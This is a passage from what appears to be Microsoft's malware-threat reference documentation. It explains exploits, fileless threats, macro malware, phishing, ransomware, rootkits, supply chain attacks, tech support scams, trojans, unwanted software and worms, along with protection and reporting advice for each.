can use to get onto your device. Malware exploits these vulnerabilities to bypass your computer's security
safeguards to infect your device.
How exploits and exploit kits work

Exploits are often the first part of a larger attack. Hackers scan for outdated systems that contain critical
vulnerabilities, which they then exploit by deploying targeted malware. Exploits often include what's called
"shellcode". This is a small malware payload that's used to download additional malware from attacker-controlled
networks. This allows hackers to infect devices and infiltrate organizations.
Exploit kits are more comprehensive tools that contain a collection of exploits. These kits scan devices for different
kinds of software vulnerabilities and, if any are detected, deploys additional malware to further infect a device. Kits
can use exploits targeting a variety of software, including Adobe Flash Player, Adobe Reader, Internet Explorer,
Oracle Java and Sun Java.
The most common method used by attackers to distribute exploits and exploit kits is through webpages, but
exploits can also arrive in emails. Some websites unknowingly and unwillingly host malicious code and exploits in
their ads.
The infographic below shows how an exploit kit might attempt to exploit a device when a compromised webpage
is visited.
Figure 1. Example of how exploit kits work

Several notable threats, including Wannacry, exploit the Server Message Block (SMB ) vulnerability CVE -2017-
0144 to launch malware.
Examples of exploit kits:
Angler / Axpergle
Neutrino
Nuclear
To learn more about exploits, read this blog post on taking apart a double zero-day sample discovered in joint
hunt with ESET.
How we name exploits

We categorize exploits in our Malware encyclopedia by the "platform" they target. For example, Exploit:Java/CVE -
2013-1489.A is an exploit that targets a vulnerability in Java.
A project called "Common Vulnerabilities and Exposures (CVE )" is used by many security software vendors. The
project gives each vulnerability a unique number, for example, CVE -2016-0778. The portion "2016" refers to the
year the vulnerability was discovered. The "0778" is a unique ID for this specific vulnerability.
You can read more on the CVE website.
How to protect against exploits

The best prevention for exploits is to keep your organization's software up to date. Software vendors provide
updates for many known vulnerabilities and making sure these updates are applied to all devices is an important
step to prevent malware.
For more general tips, see prevent malware infection.
Fileless threats
What exactly is a fileless threat? The term "fileless" suggests that a threat that does not come in a file, such as a
backdoor that lives only in the memory of a machine. However, there's no generally accepted definition. The terms
is used broadly; it's also used to describe malware families that do rely on files in order to operate.
Given that attacks involve several stages for functionalities like execution, persistence, information theft, lateral
movement, communication with command-and-control, etc., some parts of the attack chain may be fileless, while
others may involve the filesystem in some form or another.
To shed light on this loaded term, we grouped fileless threats into different categories.
Figure 1. Comprehensive diagram of fileless malware

We can classify fileless threats by their entry point, which indicates how fileless malware can arrive on a machine:
via an exploit; through compromised hardware; or via regular execution of applications and scripts.
Next, we can list the form of entry point: for example, exploits can be based on files or network data; PCI
peripherals are a type of hardware vector; and scripts and executables are sub-categories of the execution vector.
Finally, we can classify the host of the infection: for example, a Flash application that may contain an exploit; a
simple executable; a malicious firmware from a hardware device; or an infected MBR, which could bootstrap the
execution of a malware before the operating system even loads.
This helps us divide and categorize the various kinds of fileless threats. Clearly, the categories are not all the same:
some are more dangerous but also more difficult to implement, while others are more commonly used despite (or
precisely because of) not being very advanced.
From this categorization, we can glean three big types of fileless threats based on how much fingerprint they may
leave on infected machines.
Type I: No file activity performed

A completely fileless malware can be considered one that never requires writing a file on the disk. How would such
malware infect a machine in the first place? An example scenario could be a target machine receiving malicious
network packets that exploit the EternalBlue vulnerability, leading to the installation of the DoublePulsar backdoor,
which ends up residing only in the kernel memory. In this case, there is no file or any data written on a file.
Another scenario could involve compromised devices, where malicious code could be hiding in device firmware
(such as a BIOS ), a USB peripheral (like the BadUSB attack), or even in the firmware of a network card. All these
examples do not require a file on the disk in order to run and can theoretically live only in memory, surviving even
reboots, disk reformats, and OS reinstalls.
Infections of this type can be extra difficult to detect and remediate. Antivirus products usually don’t have the
capability to access firmware for inspection; even if they did, it would be extremely challenging to detect and
remediate threats at this level. Because this type of fileless malware requires high levels of sophistication and often
depend on particular hardware or software configuration, it’s not an attack vector that can be exploited easily and
reliably. For this reason, while extremely dangerous, threats of this type tend to be very uncommon and not
practical for most attacks.
Type II: Indirect file activity

There are other ways that malware can achieve fileless presence on a machine without requiring significant
engineering effort. Fileless malware of this type don’t directly write files on the file system, but they can end up
using files indirectly. This is the case for Poshspy backdoor. Attackers installed a malicious PowerShell command
within the WMI repository and configured a WMI filter to run such command periodically.
It’s possible to carry out such installation via command line without requiring the presence of the backdoor to be
on a file in the first place. The malware can thus be installed and theoretically run without ever touching the file
system. However, the WMI repository is stored on a physical file that is a central storage area managed by the CIM
Object Manager and usually contains legitimate data. Therefore, while the infection chain does technically use a
physical file, for practical purposes it’s considered a fileless attack given that the WMI repository is a multi-purpose
data container that cannot be simply detected and removed.
Type III: Files required to operate

Some malware can have some sort of fileless persistence but not without using files in order to operate. An
example for this scenario is Kovter, which creates a shell open verb handler in the registry for a random file
extension. This action means that opening a file with such extension will lead to the execution of a script through
the legitimate tool mshta.exe.
Figure 2. Kovter’s registry key
When the open verb is invoked, the associated command from the registry is launched, which results in the
execution of a small script. This script reads data from a further registry key and executes it, in turn leading to the
loading of the final payload. However, to trigger the open verb in the first place, Kovter has to drop a file with the
same extension targeted by the verb (in the example above, the extension is .bbf5590fd). It also has to set an auto-
run key configured to open such file when the machine starts.
Despite the use of files, and despite the fact that the registry too is stored in physical files, Kovter is considered a
fileless threat because the file system is of no practical use: the files with random extension contain junk data that is
not usable in verifying the presence of the threat, and the files that store the registry are containers that cannot be
detected and deleted if malicious content is present.
Categorizing fileless threats by infection host

Having described the broad categories, we can now dig into the details and provide a breakdown of the infection
hosts. This comprehensive classification covers the panorama of what is usually referred to as fileless malware. It
drives our efforts to research and develop new protection features that neutralize classes of attacks and ensure
malware does not get the upper hand in the arms race.
Exploits
File-based (Type III: executable, Flash, Java, documents): An initial file may exploit the operating system, the
browser, the Java engine, the Flash engine, etc. in order to execute a shellcode and deliver a payload in memory.
While the payload is fileless, the initial entry vector is a file.
Network-based (Type I): A network communication that takes advantage of a vulnerability in the target machine
can achieve code execution in the context of an application or the kernel. An example is WannaCry, which exploits a
previously fixed vulnerability in the SMB protocol to deliver a backdoor within the kernel memory.
Hardware
Device-based (Type I: network card, hard disk): Devices like hard disks and network cards require chipsets and
dedicated software to function. A software residing and running in the chipset of a device is called a firmware.
Although a complex task, the firmware can be infected by malware, as the Equation espionage group has been
caught doing.
CPU -based (Type I): Modern CPUs are extremely complex and may include subsystems running firmware for
management purposes. Such firmware may be vulnerable to hijacking and allow the execution of malicious code
that would hence operate from within the CPU. In December 2017, two researchers reported a vulnerability that
can allow attackers to execute code inside the Management Engine (ME ) present in any modern CPU from Intel.
Meanwhile, the attacker group PLATINUM has been observed to have the capability to use Intel's Active
Management Technology (AMT) to perform invisible network communications bypassing the installed operating
system. ME and AMT are essentially autonomous micro-computers that live inside the CPU and that operate at a
very low level. Because these technologies’ purpose is to provide remote manageability, they have direct access to
hardware, are independent of the operating system, and can run even if the computer is turned off. Besides being
vulnerable at the firmware level, CPUs could be manufactured with backdoors inserted directly in the hardware
circuitry. This attack has been researched and proved possible in the past. Just recently it has been reported that
certain models of x86 processors contain a secondary embedded RISC -like CPU core that can effectively provide a
backdoor through which regular applications can gain privileged execution.
USB -based (Type I): USB devices of all kinds can be reprogrammed with a malicious firmware capable of
interacting with the operating system in nefarious ways. This is the case of the BadUSB technique, demonstrated
few years ago, which allows a reprogrammed USB stick to act as a keyboard that sends commands to machines via
keystrokes, or as a network card that can redirect traffic at will.
BIOS -based (Type I): A BIOS is a firmware running inside a chipset. It executes when a machine is powered on,
initializes the hardware, and then transfers control to the boot sector. It’s a very important component that operates
at a very low level and executes before the boot sector. It’s possible to reprogram the BIOS firmware with
malicious code, as has happened in the past with the Mebromi rootkit.
Hypervisor-based (Type I): Modern CPUs provide hardware hypervisor support, allowing the operating system to
create robust virtual machines. A virtual machine runs in a confined, simulated environment, and is in theory
unaware of the emulation. A malware taking over a machine may implement a small hypervisor in order to hide
itself outside of the realm of the running operating system. Malware of this kind has been theorized in the past, and
eventually real hypervisor rootkits have been observed, although very few are known to date.
Execution and injection
File-based (Type III: executables, DLLs, LNK files, scheduled tasks): This is the standard execution vector. A simple
executable can be launched as a first-stage malware to run an additional payload in memory or inject it into other
legitimate running processes.
Macro-based (Type III: Office documents): The VBA language is a flexible and powerful tool designed to automate
editing tasks and add dynamic functionality to documents. As such, it can be abused by attackers to carry out
malicious operations like decoding, running, or injecting an executable payload, or even implementing an entire
ransomware, like in the case of qkG. Macros are executed within the context of an Office process (e.g.,
Winword.exe), and they’re implemented in a scripting language, so there is no binary executable that an antivirus
can inspect. While Office apps require explicit consent from the user to execute macros from a document, attackers
use social engineering techniques to trick users into allowing macros to execute.
Script-based (Type II: file, service, registry, WMI repo, shell): The JavaScript, VBScript, and PowerShell scripting
languages are available by default on Windows platforms. Scripts have the same advantages as macros: they’re
textual files (not binary executables) and they run within the context of the interpreter (e.g., wscript.exe,
powershell.exe, etc.), which is a clean and legitimate component. Scripts are very versatile; they can be run from a
file (e.g., by double-clicking them) or, in some cases, executed directly on the command line of an interpreter. Being
able to run on the command line can allow malware to encode malicious command-line scripts as auto-start
services inside autorun registry keys as WMI event subscriptions from the WMI repo. Furthermore, an attacker
who has gained access to an infected machine may input the script on the command prompt.
Disk-based (Type II: Boot Record): The Boot Record is the first sector of a disk or volume and contains executable
code required to start the boot process of the operating system. Threats like Petya are capable of infecting the Boot
Record by overwriting it with malicious code, so that when the machine is booted the malware immediately gains
control (and in the case of Petya, with disastrous consequences). The Boot Record resides outside the file system,
but it’s accessible by the operating system, and modern antivirus products have the capability to scan and restore it.
Defeating fileless malware

At Microsoft, we actively monitor the security landscape to identify new threat trends and develop solutions that
continuously enhance Windows security and mitigate classes of threats. We instrument durable protections that
are effective against a wide range of threats. Through AntiMalware Scan Interface (AMSI), behavior monitoring,
memory scanning, and boot sector protection, Windows Defender Advanced Threat Protection (Windows
Defender ATP ) can inspect fileless threats even with heavy obfuscation. Machine learning technologies in the cloud
allow us to scale these protections against new and emerging threats.
To learn more, read: Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and
next-gen AV
Macro malware
Macros are a powerful way to automate common tasks in Microsoft Office and can make people more productive.
However, macro malware uses this functionality to infect your device.
How macro malware works

Macro malware hides in Microsoft Office files and are delivered as email attachments or inside ZIP files. These files
use names that are intended to entice or scare people into opening them. They often look like invoices, receipts,
legal documents, and more.
Macro malware was fairly common several years ago because macros ran automatically whenever a document
was opened. However, in recent versions of Microsoft Office, macros are disabled by default. This means malware
authors need to convince users to turn on macros so that their malware can run. They do this by showing fake
warnings when a malicious document is opened.
We've seen macro malware download threats from the following families:
Ransom:MSIL/Swappa
Ransom:Win32/Teerac
TrojanDownloader:Win32/Chanitor
TrojanSpy:Win32/Ursnif
Win32/Fynloski
Worm:Win32/Gamarue
How to protect against macro malware

Make sure macros are disabled in your Microsoft Office applications. In enterprises, IT admins set the
default setting for macros:
Enable or disable macros in Office documents
Don’t open suspicious emails or suspicious attachments.
Delete any emails from unknown people or with suspicious content. Spam emails are the main way macro
malware spreads.
Enterprises can prevent macro malware from running executable content using ASR rules
Phishing
Phishing attacks attempt to steal sensitive information through emails, websites, text messages, or other forms of
electronic communication that often look to be official communication from legitimate companies or individuals.
The information that phishers (as the cybercriminals behind phishing attacks are called) attempt to steal can be
user names and passwords, credit card details, bank account information, or other credentials. Attackers can then
use stolen information for malicious purposes, such as hacking, identity theft, or stealing money directly from bank
accounts and credit cards. Phishers can also sell the information in cybercriminal underground marketplaces.
How phishing works

Phishing attacks are scams that often use social engineering bait or lure content. For example, during tax season,
bait content involves tax-filing announcements that attempt to lure you into providing your personal information
such as your Social Security number or bank account information.
Legitimate-looking communication, usually email, that links to a phishing site is one of the most common methods
used in phishing attacks. The phishing site typically mimics sign-in pages that require users to input login
credentials and account information. The phishing site then captures the sensitive information as soon as the user
provides it, giving attackers access to the information.
Another common phishing technique is the use of emails that direct you to open a malicious attachment, for
example a PDF file. The attachment often contains a message asking you to provide login credentials to another
site such as email or file sharing websites to open the document. When you access these phishing sites using your
login credentials, the attacker now has access to your information and can gain additional personal information
about you.
Phishing trends and techniques

Invoice phishing
In this scam, the attacker attempts to lure you with an email stating that you have an outstanding invoice from a
known vendor or company and provides a link for you to access and pay your invoice. When you access the site,
the attacker is poised to steal your personal information and funds.
Payment/delivery scam
You are asked to provide a credit card or other personal information so that your payment information can be
updated with a commonly known vendor or supplier. The update is requested so that you can take delivery of your
ordered goods. Generally, you may be familiar with the company and have likely done business with them in the
past, but you are not aware of any items you have recently purchased from them.
Tax-themed phishing scams
A common IRS phishing scams is one in which an urgent email letter is sent indicating that you owe money to the
IRS. Often the email threatens legal action if you do not access the site in a timely manner and pay your taxes.
When you access the site, the attackers can steal your personal credit card or bank information and drain your
accounts.
Downloads
Another frequently-used phishing scam is one in which an attacker sends a fraudulent email requesting you to
open or download a document, often one requiring you to sign in.
Phishing emails that deliver other threats
Phishing emails can be very effective, and so attackers can using them to distribute ransomware through links or
attachments in emails. When run, the ransomware encrypts files and displays a ransom note, which asks you to
pay a sum of money to access to your files.
We have also seen phishing emails that have links to tech support scam websites, which use various scare tactics
to trick you into calling hotlines and paying for unnecessary "technical support services" that supposedly fix
contrived device, platform, or software problems.
Targeted attacks against enterprises

Spear phishing
Spear phishing is a targeted phishing attack that involves highly customized lure content. To perform spear
phishing, attackers will typically do reconnaissance work, surveying social media and other information sources
about their intended target.
Spear phishing may involve tricking you into logging into fake sites and divulging credentials. Spear phishing may
also be designed to lure you into opening documents by clicking on links that automatically install malware. With
this malware in place, attackers can remotely manipulate the infected computer.
The implanted malware serves as the point of entry for a more sophisticated attack known as an advanced
persistent threat (APT). APTs are generally designed to establish control and steal data over extended periods. As
part of the attack, attackers often try to deploy more covert hacking tools, move laterally to other computers,
compromise or create privileged accounts, and regularly exfiltrate information from compromised networks.
Whaling
Whaling is a form of phishing in which the attack is directed at high-level or senior executives within specific
companies with the direct goal of gaining access to their credentials and/or bank information. The content of the
email may be written as a legal subpoena, customer complaint, or other executive issue. This type of attack can
also lead to an APT attack within an organization. When the links or attachment are opened, it can assist the
attacker in accessing credentials and other personal information, or launch a malware that will lead to an APT.
Business email compromise
Business email compromise (BEC ) is a sophisticated scam that targets businesses often working with foreign
suppliers and businesses that regularly perform wire transfer payments. One of the most common schemes used
by BEC attackers involves gaining access to a company’s network through a spear phishing attack, where the
attacker creates a domain similar to the company they are targeting or spoofs their email to scam users into
releasing personal account information for money transfers.
How to protect against phishing attacks

Social engineering attacks are designed to take advantage of a user's possible lapse in decision-making. Be aware
and never provide sensitive or personal information through email or unknown websites, or over the phone.
Remember, phishing emails are designed to appear legitimate.
Awareness
The best protection is awareness and education. Don’t open attachments or click links in unsolicited emails, even if
the emails came from a recognized source. If the email is unexpected, be wary about opening the attachment and
verify the URL.
Enterprises should educate and train their employees to be wary of any communication that requests personal or
financial information, and instruct them to report the threat to the company’s security operations team
immediately.
Here are several telltale signs of a phishing scam:
The links or URLs provided in emails are not pointing to the correct location or are attempting to have
you access a third-party site that is not affiliated with the sender of the email. For example, in the image
below the URL provided does not match the URL that you will be taken to.
There is a request for personal information such as social security numbers or bank or financial
information. Official communications won't generally request personal information from you in the form of
an email.
Items in the email address will be changed so that it is similar enough to a legitimate email address but
has added numbers or changed letters.
The message is unexpected and unsolicited. If you suddenly receive an email from an entity or a person
you rarely deal with, consider this email suspect.
The message or the attachment asks you to enable macros, adjust security settings, or install
applications. Normal emails will not ask you to do this.
The message contains errors. Legitimate corporate messages are less likely to have typographic or
grammatical errors or contain wrong information.
The sender address does not match the signature on the message itself. For example, an email is
purported to be from Mary of Contoso Corp, but the sender address is john@example.com.
There are multiple recipients in the “To” field and they appear to be random addresses. Corporate
messages are normally sent directly to individual recipients.
The greeting on the message itself does not personally address you. Apart from messages that
mistakenly address a different person, those that misuse your name or pull your name directly from your
email address tend to be malicious.
The website looks familiar but there are inconsistencies or things that are not quite right such as
outdated logos, typos, or ask users to give additional information that is not asked by legitimate sign-in
websites.
The page that opens is not a live page but rather an image that is designed to look like the site you are
familiar with. A pop-up may appear that requests credentials.
If in doubt, contact the business by known channels to verify if any suspicious emails are in fact legitimate.
For more information, download and read this Microsoft e-book on preventing social engineering attacks,
especially in enterprise environments.
Software solutions for organizations
Microsoft Edge and Windows Defender Application Guard offer protection from the increasing threat of
targeted attacks using Microsoft's industry leading Hyper-V virtualization technology. If a browsed website
is deemed untrusted, the Hyper-V container will isolate that device from the rest of your network thereby
preventing access to your enterprise data.
Microsoft Exchange Online Protection (EOP ) offers enterprise-class reliability and protection against spam
and malware, while maintaining access to email during and after emergencies. Using various layers of
filtering, EOP can provide different controls for spam filtering, such as bulk mail controls and international
spam, that will further enhance your protection services.
Use Office 365 Advanced Threat Protection (ATP ) to help protect your email, files, and online storage
against malware. It offers holistic protection in Microsoft Teams, Word, Excel, PowerPoint, Visio, SharePoint
Online, and OneDrive for Business. By protecting against unsafe attachments and expanding protection
against malicious links, it complements the security features of Exchange Online Protection to provide
better zero-day protection.
For more tips and software solutions, see prevent malware infection.
What do I do if I've already been a victim of a phishing scam?

If you feel that you have been a victim of a phishing attack, contact your IT Admin. You should also immediately
change all passwords associated with the accounts, and report any fraudulent activity to your bank, credit card
company, etc.
Reporting spam
Submit phishing scam emails to Microsoft by sending an email with the scam as an attachment to:
phish@office365.microsoft.com. For more information on submitting messages to Microsoft, see Submit spam,
non-spam, and phishing scam messages to Microsoft for analysis.
For Outlook and Outlook on the web users, use the Report Message Add-in for Microsoft Outlook. For
information about how to install and use this tool, see Enable the Report Message add-in.
Send an email with the phishing scam to The Anti-Phishing Working Group: reportphishing@apwg.org. The
group uses reports generated from emails sent to fight phishing scams and hackers. ISPs, security vendors,
financial institutions and law enforcement agencies are involved.
Where to find more information about phishing attacks

For information on the latest Phishing attacks, techniques, and trends, you can read these entries on the Windows
Security blog:
Phishers unleash simple but effective social engineering techniques using PDF attachments
Tax themed phishing and malware attacks proliferate during the tax filing season
Phishing like emails lead to tech support scam
Ransomware
Ransomware is a type of malware that encrypts files and folders, preventing access to important files.
Ransomware attempts to extort money from victims by asking for money, usually in form of cryptocurrencies, in
exchange for the decryption key. But cybercriminals won't always follow through and unlock the files they
encrypted.
The trend towards increasingly sophisticated malware behavior, highlighted by the use of exploits and other attack
vectors, makes older platforms especially susceptible to ransomware attacks.
How ransomware works

Most ransomware infections start with:
Email messages with attachments that try to install ransomware.
Websites hosting exploit kits that attempt to use vulnerabilities in web browsers and other software to
install ransomware.
Once ransomware infects a device, it starts encrypting files, folders, entire hard drive partitions using encryption
algorithms like RSA or RC4.
Ransomware is one of the most lucrative revenue channels for cybercriminals, so malware authors continually
improve their malware code to better target enterprise environments. Ransomware-as-a-service is a cybercriminal
business model in which malware creators sell their ransomware and other services to cybercriminals, who then
operate the ransomware attacks. The business model also defines profit sharing between the malware creators,
ransomware operators, and other parties that may be involved. For cybercriminals, ransomware is a big business,
at the expense of individuals and businesses.
Examples
Sophisticated ransomware like Spora, WannaCrypt (also known as WannaCry), and Petya (also known as
NotPetya) spread to other computers via network shares or exploits.
Spora drops ransomware copies in network shares.
WannaCrypt exploits the Server Message Block (SMB ) vulnerability CVE -2017-0144 (also called
EternalBlue) to infect other computers.
A Petya variant exploits the same vulnerability, in addition to CVE -2017-0145 (also known as
EternalRomance), and uses stolen credentials to move laterally across networks.
Older ransomware like Reveton locks screens instead of encrypting files. They display a full screen image and
then disable Task Manager. The files are safe, but they are effectively inaccessible. The image usually contains a
message claiming to be from law enforcement that says the computer has been used in illegal cybercriminal
activities and fine needs to be paid. Because of this, Reveton is nicknamed "Police Trojan" or "Police ransomware".
Ransomware like Cerber and Locky search for and encrypt specific file types, typically document and media files.
When the encryption is complete, the malware leaves a ransom note using text, image, or an HTML file with
instructions to pay a ransom to recover files.
Bad Rabbit ransomware was discovered attempting to spread across networks using hardcoded usernames and
passwords in brute force attacks.
How to protect against ransomware
Organizations can be targeted specifically by attackers, or they can be caught in the wide net cast by cybercriminal
operations. Large organizations are high value targets and attackers can demand bigger ransoms.
We recommend:
Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your data, on two different
storage types, and at least one backup offsite.
Apply the latest updates to your operating systems and apps.
Educate your employees so they can identify social engineering and spear-phishing attacks.
Controlled folder access. It can stop ransomware from encrypting files and holding the files for ransom.
Rootkits
Malware authors use rootkits to hide malware on your device, allowing malware to persist as long as possible. A
successful rootkit can potentially remain in place for years if it is undetected. During this time it will steal
information and resources.
How rootkits work

Rootkits intercept and change standard operating system processes. After a rootkit infects a device, you can’t trust
any information that device reports about itself.
For example, if you were to ask a device to list all of the programs that are running, the rootkit might stealthily
remove any programs it doesn’t want you to know about. Rootkits are all about hiding things. They want to hide
both themselves and their malicious activity on a device.
Many modern malware families use rootkits to try and avoid detection and removal, including:
Alureon
Cutwail
Datrahere (Zacinlo)
Rustock
Sinowal
Sirefef
How to protect against rootkits

Like any other type of malware, the best way to avoid rootkits is to prevent it from being installed in the first place.
Apply the latest updates to operating systems and apps.
Educate your employees so they can be wary of suspicious websites and emails.
Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your data, on two different
storage types, and at least one backup offsite.
What if I think I have a rootkit on my device?
Microsoft security software includes a number of technologies designed specifically to remove rootkits. If you think
you might have a rootkit on your device and your antimalware software isn’t detecting it, you might need an extra
tool that lets you boot to a known trusted environment.
Windows Defender Offline can be launched from Windows Security Center and has the latest anti-malware
updates from Microsoft. It’s designed to be used on devices that aren't working correctly due to a possible
malware infection.
System Guard in Windows 10 protects against rootkits and threats that impact system integrity.
What if I can’t remove a rootkit?
If the problem persists, we strongly recommend reinstalling the operating system and security software. You
should then restore your data from a backup.
Supply chain attacks are an emerging kind of threat that target software developers and suppliers. The goal is to
access source codes, build processes, or update mechanisms by infecting legitimate apps to distribute malware.
How supply chain attacks work

Attackers hunt for unsecure network protocols, unprotected server infrastructures, and unsafe coding practices.
They break in, change source codes, and hide malware in build and update processes.
Because software is built and released by trusted vendors, these apps and updates are signed and certified. In
software supply chain attacks, vendors are likely unaware that their apps or updates are infected with malicious
code when they’re released to the public. The malicious code then runs with the same trust and permissions as the
app.
The number of potential victims is significant, given the popularity of some apps. A case occurred where a free file
compression app was poisoned and deployed to customers in a country where it was the top utility app.
Types of supply chain attacks
Compromised software building tools or updated infrastructure
Stolen code-sign certificates or signed malicious apps using the identity of dev company
Compromised specialized code shipped into hardware or firmware components
Pre-installed malware on devices (cameras, USB, phones, etc.)
To learn more about supply chain attacks, read this blog post called attack inception: compromised supply chain
within a supply chain poses new risks.
How to protect against supply chain attacks

Deploy strong code integrity policies to allow only authorized apps to run.
Use endpoint detection and response solutions that can automatically detect and remediate suspicious
activities.
For software vendors and developers
Maintain a highly secure build and update infrastructure.
Immediately apply security patches for OS and software.
Implement mandatory integrity controls to ensure only trusted tools run.
Require multi-factor authentication for admins.
Build secure software updaters as part of the software development lifecycle.
Require SSL for update channels and implement certificate pinning.
Sign everything, including configuration files, scripts, XML files, and packages.
Check for digital signatures, and don’t let the software updater accept generic input and commands.
Develop an incident response process for supply chain attacks.
Disclose supply chain incidents and notify customers with accurate and timely information
For more general tips on protecting your systems and devices, see prevent malware infection.
Tech support scams
Tech support scams are an industry-wide issue where scammers use scare tactics to trick users into paying for
unnecessary technical support services that supposedly fix contrived device, platform, or software problems.
How tech support scams work

Scammers may call you directly on your phone and pretend to be representatives of a software company. They
might even spoof the caller ID so that it displays a legitimate support phone number from a trusted company.
They can then ask you to install applications that give them remote access to your device. Using remote access,
these experienced scammers can misrepresent normal system output as signs of problems.
Scammers might also initiate contact by displaying fake error messages on websites you visit, displaying support
numbers and enticing you to call. They can also put your browser on full screen and display pop-up messages that
won't go away, essentially locking your browser. These fake error messages aim to trick you into calling an
indicated technical support hotline. Note that Microsoft error and warning messages never include phone
numbers.
When you engage with the scammers, they can offer fake solutions for your “problems” and ask for payment in
the form of a one-time fee or subscription to a purported support service.
For more information, view known tech support scam numbers and popular web scams.
How to protect against tech support scams

Share and implement the general tips on how to prevent malware infection.
It is also important to keep the following in mind:
Microsoft does not send unsolicited email messages or make unsolicited phone calls to request personal or
financial information, or to fix your computer.
Any communication with Microsoft has to be initiated by you.
Don’t call the number in the pop-ups. Microsoft’s error and warning messages never include a phone
number.
Download software only from official vendor websites or the Microsoft Store. Be wary of downloading
software from third-party sites, as some of them might have been modified without the author’s knowledge
to bundle support scam malware and other threats.
Use Microsoft Edge when browsing the internet. It blocks known support scam sites using Windows
Defender SmartScreen (which is also used by Internet Explorer). Furthermore, Microsoft Edge can stop
pop-up dialogue loops used by these sites.
Enable Windows Defender Antivirus in Windows 10. It detects and removes known support scam malware.
What to do if information has been given to a tech support person

Uninstall applications that scammers asked to be install. If access has been granted, consider resetting the
device
Run a full scan with Windows Defender Antivirus to remove any malware. Apply all security updates as
soon as they are available.
Change passwords.
Call your credit card provider to reverse the charges, if you have already paid.
Monitor anomalous logon activity. Use Windows Defender Firewall to block traffic to services that you
would not normally access.
Reporting tech support scams
Help Microsoft stop scammers, whether they claim to be from Microsoft or from another tech company, by
reporting tech support scams:
www.microsoft.com/reportascam
You can also report any unsafe website that you suspect is a phishing website or contains malicious content
directly to Microsoft by filling out a Report an unsafe site form or using built in web browser functionality.
Trojans
Trojans are a common type of malware which, unlike viruses, can’t spread on their own. This means they either
have to be downloaded manually or another malware needs to download and install them.
Trojans often use the same file names as real and legitimate apps. It is easy to accidentally download a trojan
thinking that it is a legitimate app.
How trojans work

Trojans can come in many different varieties, but generally they do the following:
Download and install other malware, such as viruses or worms.
Use the infected device for click fraud.
Record keystrokes and websites visited.
Send information about the infected device to a malicious hacker including passwords, login details for
websites, and browsing history.
Give a malicious hacker control over the infected device.
How to protect against trojans

Use the following free Microsoft software to detect and remove it:
Windows Defender Antivirus for Windows 10 and Windows 8.1, or Microsoft Security Essentials for
previous versions of Windows.
Microsoft Safety Scanner
Unwanted software
Unwanted software are programs that alter the Windows experience without your consent or control. This can take
the form of modified browsing experience, lack of control over downloads and installation, misleading messages,
or unauthorized changes to Windows settings.
How unwanted software works

Unwanted software can be introduced when a user searches for and downloads applications from the internet.
Some applications are software bundlers, which means that they are packed with other applications. As a result,
other programs can be inadvertently installed when the original application is downloaded.
Here are some indications of unwanted software:
There are programs that you did not install and that may be difficult to uninstall
Browser features or settings have changed, and you can’t view or modify them
There are excessive messages about your device's health or about files and programs
There are ads that cannot be easily closed
Some indicators are harder to recognize because they are less disruptive, but are still unwanted. For example,
unwanted software can modify web pages to display specific ads, monitor browsing activities, or remove control of
the browser.
Microsoft uses an extensive evaluation criteria to identify unwanted software.
How to protect against unwanted software

To prevent unwanted software infection, download software only from official websites, or from the Microsoft
Store. Be wary of downloading software from third-party sites.
Use Microsoft Edge when browsing the internet. Microsoft Edge includes additional protections that effectively
block browser modifiers that can change your browser settings. Microsoft Edge also blocks known websites
hosting unwanted software using SmartScreen (also used by Internet Explorer).
Enable Windows Defender AV in Windows 10. It provides real-time protection against threats and detects and
removes known unwanted software.
Download Microsoft Security Essentials for real-time protection in Windows 7 or Windows Vista.
What should I do if my device is infected?
If you suspect that you have unwanted software, you can submit files for analysis.
Some unwanted software adds uninstallation entries, which means that you can remove them using Settings.
1. Select the Start button
2. Go to Settings > Apps > Apps & features.
3. Select the app you want to uninstall, then click Uninstall.
If you only recently noticed symptoms of unwanted software infection, consider sorting the apps by install date,
and then uninstall the most recent apps that you did not install.
You may also need to remove browser add-ons in your browsers, such as Internet Explorer, Firefox, or Chrome.
Worms
A worm is a type of malware that can copy itself and often spreads through a network by exploiting security
vulnerabilities. It can spread through email attachments, text messages, file-sharing programs, social networking
sites, network shares, removable drives, and software vulnerabilities.
How worms work

Worms represent a large category of malware. Different worms use different methods to infect devices.
Depending on the variant, they can steal sensitive information, change security settings, send information to
malicious hackers, stop users from accessing files, and other malicious activities.
Jenxcus (also known as Dunihi), Gamarue (also known as Androm), and Bondat have consistently remained at the
top of the list of malware that infect users running Microsoft security software. Although these worms share some
commonalities, it is interesting to note that they also have distinct characteristics.
Jenxcus has capabilities of not only infecting removable drives but can also act as a backdoor that connects
back to its server. This threat typically gets into a device from a drive-by download attack, meaning it's
installed when users just visit a compromised web page.
Gamarue typically arrives through spam campaigns, exploits, downloaders, social networking sites, and
removable drives. When Gamarue infects a device, it becomes a distribution channel for other malware.
We’ve seen it distribute other malware such as infostealers, spammers, clickers, downloaders, and rogues.
Bondat typically arrives through fictitious Nullsoft Scriptable Install System (NSIS ), Java installers, and
removable drives. When Bondat infects a system, it gathers information about the machine such as device
name, Globally Unique Identifier (GUID ), and OS build. It then sends that information to a remote server.
Both Bondat and Gamarue have clever ways of obscuring themselves to evade detection. By hiding what they are
doing, they try to avoid detection by security software.
WannaCrypt also deserves a mention here. Unlike older worms that often spread just because they could,
modern worms often spread to drop a payload (e.g. ransomware).
This image shows how a worm can quickly spread through a shared USB drive.
Figure worm spreading from a shared USB drive
How to protect against worms
Enable Windows Defender AV in Windows 10. It provides real-time protection against threats and detects and
removes known unwanted software.
Download Microsoft Security Essentials for real-time protection in Windows 7 or Windows Vista.
How Microsoft identifies malware and potentially
unwanted applications
Microsoft aims to provide customers with the most delightful and productive Windows experience possible. To
help achieve that, we try our best to ensure our customers are safe and in control of their devices.
Microsoft gives you the information and tools you need when downloading, installing, and running software, as
well as tools that protect you when we know that something unsafe is happening. Microsoft does this by
identifying and analyzing software and online content against criteria described in this article.
You can participate in this process by submitting software for analysis. Our analysts and intelligent systems can
then help identify undesirable software and ensure they are covered by our security solutions.
Because new forms of malware and potentially unwanted applications are being developed and distributed rapidly,
Microsoft reserves the right to adjust, expand, and update these criteria without prior notice or announcements.
Malware
Malware is the overarching name for applications and other code, i.e. software, that Microsoft classifies more
granularly as malicious software or unwanted software.
Malicious software
Malicious software is an application or code that compromises user security. Malicious software might steal your
personal information, lock your PC until you pay a ransom, use your PC to send spam, or download other
malicious software. In general, malicious software tricks, cheats, or defrauds users, places users in vulnerable
states, or performs other malicious activities.
